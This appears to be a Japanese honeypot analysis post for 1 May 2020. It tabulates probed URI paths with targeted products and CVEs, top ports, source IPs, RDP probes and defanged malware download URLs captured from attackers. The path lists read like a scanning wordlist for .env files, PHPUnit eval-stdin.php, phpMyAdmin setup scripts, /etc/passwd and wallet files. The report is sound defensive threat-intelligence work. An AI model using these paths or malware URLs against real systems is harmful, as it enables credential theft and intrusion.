/HNAP1/ D-Link Router CVE-2017-3193 2 件
hxxp://163[.]172[.]88[.]110:41298/pass Unauthorized relay - 2 件
/Telerik[.]Web[.]UI[.]WebResource[.]axd Telerik - 2 件
/solr/ - - 2 件
hxxp://112[.]35[.]88[.]28:8088/index[.]p
hp
 - - 2 件
/cgi-bin/nobody/ CGI - 2 件
/cdn-cgi/trace Cloudflare - 2 件
/myadmin/scripts/setup[.]php Administrator - 2 件
/MyAdmin/scripts/setup[.]php Administrator - 2 件
/scripts/setup[.]php - - 2 件
/login[.]html Login Page - 2 件
hxxp://112[.]35[.]66[.]7:8088/index[.]ph
p
 - - 2 件
/php-my-admin/scripts/setup[.]php phpMyAdmin - 2 件
/mysql/scripts/setup[.]php MySQL - 2 件
/mysqladmin/scripts/setup[.]php MySQL - 2 件
hxxp://example[.]com/ Unauthorized relay - 2 件
/admin/connection/ Administrator - 2 件
/myjsp[.]jsp Unknown Unknown 2 件
//hxxpmon[.]php ZABBIX CVE-2013-5743 2 件
/zabbix//hxxpmon[.]php ZABBIX CVE-2013-5743 2 件
//proxies[.]php Zabbix - 2 件
/zabbix//proxies[.]php Zabbix - 2 件
/api_jsonrpc[.]php api - 2 件
/zabbix/api_jsonrpc[.]php Zabbix - 2 件
hxxp://www[.]proxylists[.]net/proxyjudge
[.]php
 Unauthorized relay - 1 件
/s - - 1 件
/webadmin Administrator - 1 件
/home[.]asp ASP file - 1 件
/vpn/index[.]html - - 1 件
/cgi-bin/luci CGI - 1 件
/dana-na/auth/url_default/welcome[.]cgi Pulse/Juniper Networks SA2000 SSL VPN CVE-2019-11539/ 1 件
/remote/login VPN Login - 1 件
/index[.]asp index - 1 件
/htmlV/welcomeMain[.]htm Verizon Modem Router - 1 件
/Temporary_Listen_Addresses/SMSSERVICE Microsoft SharePoint CVE-2019-0604 1 件
/wallet[.]dat Bitcoin - 1 件
/bitcoin/wallet[.]dat Bitcoin - 1 件
/backup/wallet[.]dat Bitcoin - 1 件
/Bitcoin/wallet[.]dat Bitcoin - 1 件
/bitcoin/backup/wallet[.]dat Bitcoin - 1 件
/backup/bitcoin/wallet[.]dat Bitcoin - 1 件
/wallet/wallet[.]dat Bitcoin - 1 件
/onvif/device_service VIVOTEK FD8177 devices CVE-2018-14770 1 件
/PSIA/index IP Camera - 1 件
//Admin/scripts/setup[.]php Administrator - 1 件
/file_handler/file[.]php RACCOON STEALER - 1 件
/Autodiscover/Autodiscover[.]xml Outlook - 1 件
/goform/webLogin Unknown Unknown 1 件
/news[.]php - - 1 件
/pmd/index[.]php - - 1 件
/pmd/ index[.]php - - 1 件
/phpmyadmin/ index[.]php - - 1 件
hxxp://5[.]188[.]210[.]101/echo[.]php Unauthorized relay - 1 件
/spywall/timeConfig[.]php - - 1 件
/tmpfs/snap[.]jpg INSTAR IP Camera - 1 件
/wp-content/plugins/ultimate-elementor/a
ssets/min-js/uael-registration[.]min[.]j
s
 WordPress - 1 件
hxxp://112[.]35[.]63[.]31:8088/index[.]p
hp
 - - 1 件
/lPn3 Unknown 1 件
/user/register Drupal CVE-2018-7600 1 件
/wp-content/plugins/elementor-pro/assets
/css/frontend[.]min[.]css
 WordPress - 1 件
/// - - 1 件
///wp-json/wp/v2/users/ - - 1 件
/stats/ - - 1 件
/wp-json/trx_addons/v2/get/sc_layout WordPress - 1 件
/prov/ Unknown Unknown 1 件
/polycom/ Polycom - 1 件
/prov_l/ Unknown Unknown 1 件
/ata/ Unknown Unknown 1 件
/tftp/ TFTP Server - 1 件
/cisco/ Cisco - 1 件
/phonecnf/ - - 1 件
/snom/ - - 1 件
/linksys/ Linksys - 1 件
/firmware/ Unknown Unknown 1 件
/configs/ - - 1 件
/tftproot/ TFTP Server - 1 件
/tftpboot/ TFTP Server CVE-2008-1611 1 件
/tftpphone/ Unknown Unknown 1 件
/tftpphones/ Unknown Unknown 1 件
/yealink/ yealink - 1 件
/provision/ cfg file- 20200626 1 件
/provisioning/ cfg file- 20200626 1 件
/grandstream/ grandstream - 1 件
/TftpURL/ THTP - 1 件
/config/ - - 1 件
/phone/ - - 1 件
/phones/ - - 1 件
/phone1/ - - 1 件
/phones1/ - - 1 件
/autoprov/ cfg file- 20200626 1 件
/autoprovision/ cfg file - 1 件
/autoprovisioning/ Router - 1 件
/autoprpv/ cfg file - 1 件
/autoprpvision/ cfg file - 1 件
/autoprpvisioning/ cfg file - 1 件
/voipprov/ conf file - 1 件
/cfgprov/ Polycom - 1 件
/sip/ - - 1 件
/xml/ Unknown - 1 件
/backup/ - - 1 件
/cfgs/ Unknown Unknown 1 件
/cfgsip/ cfg file - 1 件
/panasonic/ Panasonic - 1 件
/manage/ - - 1 件
/pro/ - - 1 件
/cfg[.]xml/ Unknown Unknown 1 件
/POLYCOM/ Polycom - 1 件
/path/ - - 1 件
/priv/ Unknown Unknown 1 件
/provisioning[.]cfg/ cfg file- 20200626 1 件
/prv/ Unknown Unknown 1 件
/poly/ Polycom - 1 件
/binconf/ Unknown Unknown 1 件
/poprov/ Unknown Unknown 1 件
/PlcmSpIp/ Polycom - 1 件
/audiocodes/ Unknown Unknown 1 件
/Grandstream/ grandstream - 1 件
/pr1ove/ Unknown Unknown 1 件
/provdf/ Unknown Unknown 1 件
/polycom[.]cfg/ Polycom - 1 件
/digium/ Unknown Unknown 1 件
/avaya/ avaya - 1 件
/Snom/ - - 1 件
/broadsoft/ Unknown Unknown 1 件
/vntransfert/ Unknown Unknown 1 件
/wp-admin/admin-ajax[.]php Administrator - 1 件
hxxp://ip[.]sb/ Unauthorized relay - 1 件
/user/soapCaller[.]bs Drupal - 1 件
/mynameis[.]php Unknown Unknown 1 件
/[.]remote Hidden files - 1 件
/[.]local Hidden files - 1 件
/[.]production Hidden files - 1 件
//vendor/[.]env env file - 1 件
//lib/[.]env env file - 1 件
//lab/[.]env env file - 1 件
//cronlab/[.]env env file - 1 件
//cron/[.]env env file - 1 件
//core/[.]env env file - 1 件
//core/app/[.]env env file - 1 件
//core/Datavase/[.]env env file - 1 件
//database/[.]env Database - 1 件
//config/[.]env env file - 1 件
//assets/[.]env env file - 1 件
//app/[.]env env file - 1 件
//apps/[.]env env file - 1 件
//uploads/[.]env env file - 1 件
//sitemaps/[.]env env file - 1 件
//saas/[.]env env file - 1 件
//api/[.]env env file - 1 件
//psnlink/[.]env env file - 1 件
//exapi/[.]env env file - 1 件
//admin/vendor/phpunit/phpunit/src/Util/
PHP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//api/vendor/phpunit/phpunit/src/Util/PH
P/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//api2/vendor/phpunit/phpunit/src/Util/P
HP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//app/vendor/phpunit/phpunit/src/Util/PH
P/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//apps/vendor/phpunit/phpunit/src/Util/P
HP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//assets/vendor/phpunit/phpunit/src/Util
/PHP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//backup/vendor/phpunit/phpunit/src/Util
/PHP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//blog/vendor/phpunit/phpunit/src/Util/P
HP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//cms/vendor/phpunit/phpunit/src/Util/PH
P/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//config/vendor/phpunit/phpunit/src/Util
/PHP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//core/Datavase/vendor/phpunit/phpunit/s
rc/Util/PHP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//core/app/vendor/phpunit/phpunit/src/Ut
il/PHP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//core/vendor/phpunit/phpunit/src/Util/P
HP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//cron/vendor/phpunit/phpunit/src/Util/P
HP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//cronlab/vendor/phpunit/phpunit/src/Uti
l/PHP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//database/vendor/phpunit/phpunit/src/Ut
il/PHP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//demo/vendor/phpunit/phpunit/src/Util/P
HP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//dev/vendor/phpunit/phpunit/src/Util/PH
P/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//exapi/vendor/phpunit/phpunit/src/Util/
PHP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//lab/vendor/phpunit/phpunit/src/Util/PH
P/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//laravel/vendor/phpunit/phpunit/src/Uti
l/PHP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//lib/phpunit/Util/PHP/eval-stdin[.]php PHPUnit CVE-2017-9841 1 件
//lib/phpunit/phpunit/Util/PHP/eval-stdi
n[.]php
 PHPUnit CVE-2017-9841 1 件
//lib/phpunit/phpunit/src/Util/PHP/eval-
stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//lib/phpunit/src/Util/PHP/eval-stdin[.]
php
 PHPUnit CVE-2017-9841 1 件
//lib/vendor/phpunit/phpunit/src/Util/PH
P/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//new/vendor/phpunit/phpunit/src/Util/PH
P/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//old/vendor/phpunit/phpunit/src/Util/PH
P/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//panel/vendor/phpunit/phpunit/src/Util/
PHP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//phpunit/Util/PHP/eval-stdin[.]php PHPUnit CVE-2017-9841 1 件
//phpunit/phpunit/Util/PHP/eval-stdin[.]
php
 PHPUnit CVE-2017-9841 1 件
//phpunit/phpunit/src/Util/PHP/eval-stdi
n[.]php
 PHPUnit CVE-2017-9841 1 件
//phpunit/src/Util/PHP/eval-stdin[.]php PHPUnit CVE-2017-9841 1 件
//protected/vendor/phpunit/phpunit/src/U
til/PHP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//psnlink/vendor/phpunit/phpunit/src/Uti
l/PHP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//saas/vendor/phpunit/phpunit/src/Util/P
HP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//sitemaps/vendor/phpunit/phpunit/src/Ut
il/PHP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//sites/all/libraries/mailchimp/vendor/p
hpunit/phpunit/src/Util/PHP/eval-stdin[.
]php
 PHPUnit CVE-2017-9841 1 件
//sites/default/libraries/mailchimp/vend
or/phpunit/phpunit/src/Util/PHP/eval-std
in[.]php
 PHPUnit CVE-2017-9841 1 件
//uploads/vendor/phpunit/phpunit/src/Uti
l/PHP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//vendor/phpunit/Util/PHP/eval-stdin[.]p
hp
 PHPUnit CVE-2017-9841 1 件
//vendor/phpunit/phpunit/Util/PHP/eval-s
tdin[.]php
 PHPUnit CVE-2017-9841 1 件
//vendor/phpunit/phpunit/src/Util/PHP/ev
al-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//vendor/phpunit/src/Util/PHP/eval-stdin
[.]php
 PHPUnit CVE-2017-9841 1 件
//vendor/vendor/phpunit/phpunit/src/Util
/PHP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//wp-content/plugins/cloudflare/vendor/p
hpunit/phpunit/src/Util/PHP/eval-stdin[.
]php
 PHPUnit CVE-2017-9841 1 件
//wp-content/plugins/dzs-videogallery/cl
ass_parts/vendor/phpunit/phpunit/src/Uti
l/PHP/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//wp-content/plugins/jekyll-exporter/ven
dor/phpunit/phpunit/src/Util/PHP/eval-st
din[.]php
 PHPUnit CVE-2017-9841 1 件
//wp-content/plugins/mm-plugin/inc/vendo
rs/vendor/phpunit/phpunit/src/Util/PHP/e
val-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
//www/vendor/phpunit/phpunit/src/Util/PH
P/eval-stdin[.]php
 PHPUnit CVE-2017-9841 1 件
/images[.]php - - 1 件
/sftp-config[.]json - - 1 件
/[.]ftpconfig Hidden files - 1 件
/[.]remote-sync[.]json Hidden files - 1 件
/[.]vscode/ftp-sync[.]json Hidden files - 1 件
/[.]vscode/sftp[.]json Hidden files - 1 件
/deployment-config[.]json Atom - 1 件
/ftpsync[.]settings FTPSync - 1 件
/admin/ Administrator - 1 件
hxxp://112[.]124[.]42[.]80:63435/ Unauthorized relay - 1 件
/wp// WordPress - 1 件
/wp//wp-json/wp/v2/users/ WordPress - 1 件
/wordpress// WordPress - 1 件
/wordpress//wp-json/wp/v2/users/ WordPress - 1 件
/a2billing/admin/Public/index[.]php - - 1 件
/card_scan_decoder[.]php Linear eMerge E3-Series CVE-2019-7256 1 件
hxxp://112[.]35[.]53[.]83:8088/index[.]p
hp
 - - 1 件
/var/lib/phpmyadmin/config[.]inc[.]php phpMyAdmin - 1 件
/lib/phpmyadmin/config[.]inc[.]php phpMyAdmin - 1 件
/phpmyadmin/config[.]inc[.]php phpMyAdmin - 1 件
/phpmy/scripts/setup[.]php phpMyAdmin - 1 件
/admindb/scripts/setup[.]php Administrator - 1 件
/admin/phpmyadmin/scripts/setup[.]php phpMyAdmin - 1 件
/admin/scripts/setup[.]php Administrator - 1 件
/dbadmin/scripts/setup[.]php Administrator - 1 件
/db/scripts/setup[.]php Database - 1 件
/phpmyadmin2/scripts/setup[.]php phpMyAdmin - 1 件
/phpMyAdmin/scripts/setup0[.]php phpMyAdmin - 1 件
/phpmyadmin/scripts/setup1[.]php phpMyAdmin - 1 件
/_phpmyadmin/scripts/setup[.]php phpMyAdmin - 1 件
/phpmyadmin_/scripts/setup[.]php phpMyAdmin - 1 件
/phpmyadmin/scripts/_setup[.]php phpMyAdmin - 1 件
/phpMyAdmin/scripts[.]setup[.]php phpMyAdmin - 1 件
/sql/scripts/setup[.]php - - 1 件
/web/phpMyAdmin/scripts/setup[.]php phpMyAdmin - 1 件
/configuracion/phpmyadmin/scripts/setup[
.]php
 - - 1 件
/websql/scripts/setup[.]php SQL - 1 件
/sqladmin/scripts/setup[.]php - - 1 件
/php/scripts/setup[.]php php - 1 件
/php/phpMyAdmin/scripts/setup[.]php phpMyAdmin - 1 件
/phpmyadmin/scripts/setup[.]php/index[.]
php
 - - 1 件
/phpMyAdmin-2[.]8[.]0[.]4/scripts/setup[
.]php
 phpMyAdmin - 1 件
/phpmy-admin/scripts/setup[.]php phpMyAdmin - 1 件
/php-admin/scripts/setup[.]php Administrator - 1 件
/phpMyAdmin-2[.]8[.]2/scripts/setup[.]ph
p
 phpMyAdmin - 1 件
/phpMyAdmin-2[.]8[.]1/scripts/setup[.]ph
p
 phpMyAdmin - 1 件
/phpMyAdmin-2[.]8[.]0/scripts/setup[.]ph
p
 phpMyAdmin - 1 件
/wp-content/plugins/wp-phpmyadmin/wp-php
myadmin/phpmyadmin/scripts/setup[.]php
 phpMyAdmin - 1 件
/wp-phpmyadmin/scripts/setup[.]php phpMyAdmin - 1 件
/wp-phpmyadmin/phpmyadmin/scripts/setup[
.]php
 phpMyAdmin - 1 件
/wordpress/wp-content/plugins/wp-phpmyad
min/phpmyadmin/scripts/setup[.]php
 phpMyAdmin - 1 件
/wp/wp-content/plugins/wp-phpmyadmin/php
myadmin/scripts/setup[.]php
 phpMyAdmin - 1 件
/webapps/phpmyadmin/scripts/setup[.]php phpMyAdmin - 1 件
/phpmyadmin[.]box25/scripts/setup[.]php phpMyAdmin - 1 件
/admincooptel/phpMyAdmin/scripts/setup[.
]php
 phpMyAdmin - 1 件
/pyaniste/mysqladmin/scripts/setup[.]php MySQL - 1 件
/alt/sqladmin/scripts/setup[.]php SQLAdmin - 1 件
/phpMyAdmin-2[.]6[.]3/scripts/setup[.]ph
p
 phpMyAdmin - 1 件
/phpMyAdmin-2[.]6[.]4/scripts/setup[.]ph
p
 phpMyAdmin - 1 件
/phpMyAdmin-2[.]7[.]0/scripts/setup[.]ph
p
 phpMyAdmin - 1 件
/phpMyAdmin-2[.]5[.]6/scripts/setup[.]ph
p
 phpMyAdmin - 1 件
/phpMyAdmin-2[.]5[.]7/scripts/setup[.]ph
p
 phpMyAdmin - 1 件
/etc/passwd passwd file - 1 件
/dnscfg[.]cgi D-Link DSL - 1 件
//runtime/log/202005/22[.]log Unknown Unknown 1 件
hxxp://123[.]125[.]114[.]144/ Unauthorized relay - 1 件
www[.]baidu[.]com:443 Unauthorized relay - 1 件
hxxp://www[.]123cha[.]com/ Unauthorized relay - 1 件
hxxp://www[.]rfa[.]org/english/ Unauthorized relay - 1 件
www[.]ipip[.]net:443 Unauthorized relay - 1 件
cn[.]bing[.]com:443 Unauthorized relay - 1 件
/[.]git/config Hidden files - 1 件
/vod_installer/[.]env env file - 1 件
/login/[.]env Login Page - 1 件
/fedex/[.]env env file - 1 件
/apps/[.]env env file - 1 件
/docker/[.]env env file - 1 件
/engine/[.]env env file - 1 件
/app/[.]env env file - 1 件
/sources/[.]env - - 1 件
/inc/[.]env env file - 1 件
/development/[.]env env file - 1 件
/system/[.]env - - 1 件
/admin/[.]env Administrator - 1 件
/deployment/[.]env env file - 1 件
/a/[.]env env file - 1 件
/react/[.]env env file - 1 件
/travis/[.]env env file - 1 件
/public/[.]env env file - 1 件
/backend/[.]env env file - 1 件
/protected/[.]env env file - 1 件
/dependencies/[.]env env file - 1 件
/vue/[.]env env file - 1 件
/laravel/[.]env env file - 1 件
/auth/[.]env env file - 1 件
/scripts/[.]env - - 1 件
/personal/[.]env env file - 1 件
/cp/[.]env env file - 1 件
/framework/[.]env env file - 1 件
/shared/[.]env - - 1 件
/m/[.]env env file - 1 件
/server/[.]env - - 1 件
/local/[.]env env file - 1 件
/admin-app/[.]env Administrator - 1 件
/web/[.]env web page - 1 件
/search/[.]env - - 1 件
/cron/[.]env env file - 1 件
/document/[.]env env file - 1 件
/src/[.]env - - 1 件
/master/[.]env env file - 1 件
/application/[.]env env file - 1 件
/frontend/[.]env env file - 1 件
/ironment/[.]env env file - 1 件
/project/[.]env env file - 1 件
/rest/[.]env env file - 1 件
/mods/[.]env env file - 1 件
/routes/[.]env env file - 1 件
/~dev/[.]env env file - 1 件
/private/[.]env env file - 1 件
/dev/[.]env env file - 1 件
/site/[.]env - - 1 件
/back/[.]env env file - 1 件
/api/[.]env api - 1 件
/laravel-artisan/[.]env env file - 1 件
/config/[.]env - - 1 件
/cli/[.]env env file - 1 件
/core/[.]env env file - 1 件
github[.]com:443 Unauthorized Relay - 1 件
/vicidial/admin[.]php Administrator - 1 件

【ハニーポット簡易分析】Honeypot簡易分析(2020/5/1)

/public/spread.php に対してバックドアを設置していると思われる通信を検知していました。 何の製品を狙ったものであるか特定はできていませんが。。。。

Port(TOP20)

  1. Honeytrap
Port Service Count
22 The Secure Shell (SSH) Protocol 3372 件
1433 Microsoft-SQL-Server 1536 件
445 Microsoft-DS 1458 件
3389 MS WBT Server 669 件
9943 Unknown 136 件
13 Daytime 101 件
1057 STARTRON 98 件
19101 Unknown 98 件
89 SU/MIT Telnet Gateway 97 件
49158 Unknown 96 件
2111 OPNET Dynamic Sampling Agent Transaction Protocol 96 件
10566 Unknown 95 件
8254 Unknown 94 件
9877 The X.510 wrapper protocol 94 件
8009 NVMe over Fabrics Discovery Service 93 件
5510 Unknown 93 件
6789 GSS-API for the Oracle Remote Administration Daemon 93 件
6567 Unknown 90 件
9200 WAP connectionless session service 88 件
3003 CGMS 88 件

IP(TOP20)

01 Honeytrap

IP Country Count AbuseIPDB
185[.]202[.]1[.]19 France 8197 件 Link
185[.]202[.]2[.]77 France 3536 件 Link
185[.]158[.]113[.]43 Russia 1967 件 Link
51[.]68[.]128[.]161 France 1076 件 Link
185[.]202[.]2[.]120 France 895 件 Link
218[.]92[.]0[.]208 China 872 件 Link
185[.]202[.]1[.]10 France 847 件 Link
198[.]245[.]50[.]167 Canada 756 件 Link
27[.]115[.]124[.]74 China 541 件 Link
27[.]115[.]124[.]9 China 528 件 Link
27[.]115[.]124[.]10 China 521 件 Link
52[.]170[.]209[.]74 United States 482 件 Link
49[.]88[.]112[.]68 China 482 件 Link
27[.]115[.]124[.]75 China 467 件 Link
45[.]141[.]84[.]21 Russia 445 件 Link
198[.]108[.]67[.]48 United States 408 件 Link
92[.]63[.]194[.]15 Russia 329 件 Link
195[.]54[.]167[.]225 Russia 215 件 Link
111[.]206[.]250[.]230 China 188 件 Link
111[.]206[.]250[.]235 China 181 件 Link

02 WOWHoneypot

IP Country Count AbuseIPDB
45[.]250[.]43[.]17 China 16 件 Link
77[.]247[.]108[.]119 Estonia 8 件 Link
128[.]14[.]134[.]170 United States 3 件 Link
80[.]82[.]68[.]72 Netherlands 3 件 Link
3[.]84[.]67[.]149 United States 2 件 Link
124[.]122[.]181[.]66 Thailand 2 件 Link
185[.]234[.]218[.]68 Poland 2 件 Link
162[.]243[.]142[.]155 United States 1 件 Link
206[.]189[.]187[.]99 United States 1 件 Link
50[.]198[.]14[.]142 United States 1 件 Link
202[.]62[.]13[.]68 Indonesia 1 件 Link
162[.]243[.]138[.]225 United States 1 件 Link
61[.]219[.]11[.]153 Taiwan 1 件 Link
37[.]145[.]248[.]134 Russia 1 件 Link
88[.]203[.]226[.]106 Bulgaria 1 件 Link
103[.]135[.]39[.]118 India 1 件 Link
139[.]162[.]119[.]197 Japan 1 件 Link
79[.]129[.]2[.]169 Greece 1 件 Link
186[.]233[.]178[.]39 Brazil 1 件 Link
196[.]52[.]43[.]86 South Africa 1 件 Link

03 WOWHoneypot(SSL)

IP Country Count AbuseIPDB
45[.]250[.]43[.]17 China 16 件 Link
77[.]247[.]108[.]119 Estonia 8 件 Link
128[.]14[.]134[.]170 United States 3 件 Link
80[.]82[.]68[.]72 Netherlands 3 件 Link
3[.]84[.]67[.]149 United States 2 件 Link
124[.]122[.]181[.]66 Thailand 2 件 Link
185[.]234[.]218[.]68 Poland 2 件 Link
162[.]243[.]142[.]155 United States 1 件 Link
206[.]189[.]187[.]99 United States 1 件 Link
50[.]198[.]14[.]142 United States 1 件 Link
202[.]62[.]13[.]68 Indonesia 1 件 Link
162[.]243[.]138[.]225 United States 1 件 Link
61[.]219[.]11[.]153 Taiwan 1 件 Link
37[.]145[.]248[.]134 Russia 1 件 Link
88[.]203[.]226[.]106 Bulgaria 1 件 Link
103[.]135[.]39[.]118 India 1 件 Link
139[.]162[.]119[.]197 Japan 1 件 Link
79[.]129[.]2[.]169 Greece 1 件 Link
186[.]233[.]178[.]39 Brazil 1 件 Link
196[.]52[.]43[.]86 South Africa 1 件 Link

URI Path

NEW URI Path

01 Honeytrap

URI Path Target CVE Memo
/playlist[.]m3u8 HTTP Live Streaming (HLS) - -
/setup[.]xml - - -
/stat - - -

02 WOWHoneypot

URI Path Target CVE Memo
/public/spread[.]php Unknown - -
/clientaccesspolicy[.]xmlSilverlight - -
/s - - -

03 WOWHoneypot(SSL)

URI Path Target CVE Memo
- - - -

URI Path

01 Honeytrap

URI Path Target CVE Count
No uri path - - 28739 件
/ - - 615 件
/nice - - 55 件
sip:nm Session Initiation Protocol - 51 件
/ws/v1/cluster/apps/new-application Apache Hadoop - 44 件
/version - - 41 件
/api api - 37 件
/hazelcast/rest/cluster Open-Xchange AppSuite CVE-2013-5936 32 件
login[.]cgi D-Link Router - 31 件
/server-info Apache - 31 件
SERVER - - 31 件
/picsdesc[.]xml Realtek SDK CVE-2014-8361 21 件
/admin/assets/js/views/login[.]js FreePBX - 7 件
/ctrlt/DeviceUpgrade_1 Huawei Home Device - 7 件
hxxp://clientapi[.]ipip[.]net/echo[.]php Unauthorized relay - 6 件
/cgi CGI - 6 件
/shell MVPower DVR - 5 件
[.][.]/[.][.]/proc/ proc directory - 4 件
/home[.]asp ASP file - 3 件
/login[.]cgi D-Link Router - 3 件
/vpn/index[.]html - - 3 件
/cgi-bin/luci CGI - 3 件
/dana-na/auth/url_default/welcome[.]cgi Pulse/Juniper Networks SA2000 SSL VPN CVE-2019-11539/ 3 件
/remote/login VPN Login - 3 件
/index[.]asp index - 3 件
/htmlV/welcomeMain[.]htm Verizon Modem Router - 3 件
/manager/html Apache Tomcat Manager - 3 件
/_search Elasticsearch - 3 件
/playlist[.]m3u8 New - 2 件
/api/v1/targets api - 2 件
/api/v1/label/version/values api - 2 件
hxxp://example[.]com/ Unauthorized relay - 2 件
/setup/eureka_info Google Home Hub - 2 件
/wls-wsat/CoordinatorPortType11 Weblogic CVE-2017-10271 2 件
/hudson Unknown - 1 件
/setup[.]xml New - 1 件
/status - - 1 件
/stat New - 1 件
/info - - 1 件
/install[.]php php - 1 件
rtsp://160[.]16[.]145[.]183:8554/ Real Time Streaming Protocol - 1 件
/cgi-bin/webctrl[.]cgi CGI - 1 件
/stats - - 1 件
/db/manage/ Database - 1 件
/securityRealm/user/admin/search/index Administrator - 1 件
/solr/admin/info/system Apache Solr - 1 件
/manager Apache Tomcat Manager - 1 件
/_nodes Unknown - 1 件
hxxp://123[.]125[.]114[.]144/ Unauthorized relay - 1 件
/tmUnblock[.]cgi Linksys E-series - 1 件
/v1/agent/self Hashicorp Consul - 1 件
/jmx JMX - 1 件

02 WOWHoneypot

URI Path Target CVE Count
/ - - 35 件
/admin/assets/js/views/login[.]js FreePBX - 8 件
/public/index[.]php - - 8 件
/public/index[.]php/ - - 3 件
/cgi-bin/mainfunction[.]cgi DrayTek CVE-2020-8515 3 件
/public/spread[.]php New - 2 件
/hudson Unknown - 1 件
/clientaccesspolicy[.]xml New - 1 件
/boaform/admin/formPing Administrator - 1 件
/phpmyadmin/index[.]php - - 1 件
/index[.]php - - 1 件
/s New - 1 件
/portal/redlion Unknown - 1 件
/robots[.]txt robots.txt - 1 件
/favicon[.]ico favicon - 1 件
ip[.]ws[.]126[.]net:443 Unauthorized Relay - 1 件

03 WOWHoneypot(SSL)

URI Path Target CVE Count
/admin/assets/js/views/login[.]js FreePBX - 7 件
/ - - 6 件
/robots[.]txt robots.txt - 1 件
/favicon[.]ico favicon - 1 件
/owa/auth/logon[.]aspx Microsoft Exchange Server CVE-2018-16793 1 件
/home[.]asp ASP file - 1 件
/login[.]cgi D-Link Router - 1 件
/vpn/index[.]html - - 1 件
/cgi-bin/luci CGI - 1 件
/dana-na/auth/url_default/welcome[.]cgi Pulse/Juniper Networks SA2000 SSL VPN CVE-2019-11539/ 1 件
/remote/login VPN Login - 1 件
/index[.]asp index - 1 件
/htmlV/welcomeMain[.]htm Verizon Modem Router - 1 件

Malware

  1. Honeytrap
Malware Localport RemoteIP URI Path Count
hxxp://88[.]218[.]16[.]118/infect 60001 37[.]49[.]226[.]217 /shell 2 件
hxxp://212[.]114[.]52[.]128/arm7 8089 184[.]162[.]45[.]52 /cgi 1 件
hxxp://176[.]123[.]3[.]96/arm7 8089 74[.]105[.]81[.]187 /cgi 1 件
hxxp://185[.]172[.]110[.]224/ab/arm7 60001 80[.]82[.]78[.]104 /shell 1 件
hxxp://185[.]62[.]189[.]18/jaws[.]sh 60001 151[.]63[.]181[.]233 /shell 1 件
hxxp://178[.]33[.]64[.]107/arm7 8089 183[.]215[.]125[.]142 /cgi 1 件
hxxp://192[.]3[.]45[.]185/arm7 8089 75[.]148[.]156[.]244 /cgi 1 件
hxxp://178[.]33[.]64[.]107/arm7 8089 118[.]185[.]161[.]227 /cgi 1 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 6380 113[.]214[.]30[.]171 No uri path 1 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 6378 113[.]214[.]30[.]171 No uri path 1 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 6381 113[.]214[.]30[.]171 No uri path 1 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 6379 113[.]214[.]30[.]171 No uri path 1 件
hxxp://192[.]3[.]45[.]185/arm7 8089 45[.]167[.]158[.]123 /cgi 1 件
hxxp://176[.]32[.]35[.]22/infect 60001 37[.]49[.]226[.]213 /shell 1 件
hxxp://23[.]95[.]89[.]93/bins/mpsl 8080 197[.]44[.]136[.]232 /tmUnblock[.]cgi 1 件
hxxp://185[.]181[.]10[.]234/E5DB0E07C3D7BE80V520/init[.]sh 9200 182[.]92[.]242[.]45 /_search 1 件

RDP

Port/IP

Port IP Country Count AbuseIPDB
3389 52[.]170[.]209[.]74 United States 482 件 Link
3389 95[.]47[.]248[.]84 Ukraine 79 件 Link
3389 95[.]217[.]108[.]101 Germany 9 件 Link
3389 222[.]174[.]105[.]82 China 6 件 Link
33890 222[.]186[.]20[.]98 China 6 件 Link
3390 193[.]169[.]252[.]136 Poland 4 件 Link
2398 185[.]202[.]2[.]120 France 4 件 Link
51215 185[.]202[.]2[.]120 France 3 件 Link
13347 185[.]202[.]2[.]120 France 3 件 Link
3389 104[.]206[.]128[.]66 United States 3 件 Link
4625 185[.]202[.]2[.]120 France 3 件 Link
58712 185[.]202[.]2[.]120 France 3 件 Link
13458 185[.]202[.]2[.]120 France 3 件 Link
3389 212[.]92[.]122[.]56 Netherlands 3 件 Link
36191 185[.]202[.]2[.]120 France 3 件 Link
9983 92[.]118[.]161[.]1 Republic of Lithuania 3 件 Link
11726 185[.]202[.]2[.]120 France 3 件 Link
45588 185[.]158[.]113[.]43 Russia 2 件 Link
53503 185[.]158[.]113[.]43 Russia 2 件 Link
18079 185[.]158[.]113[.]43 Russia 2 件 Link

Port

Port Count
3389 659 件
3390 17 件
3393 12 件
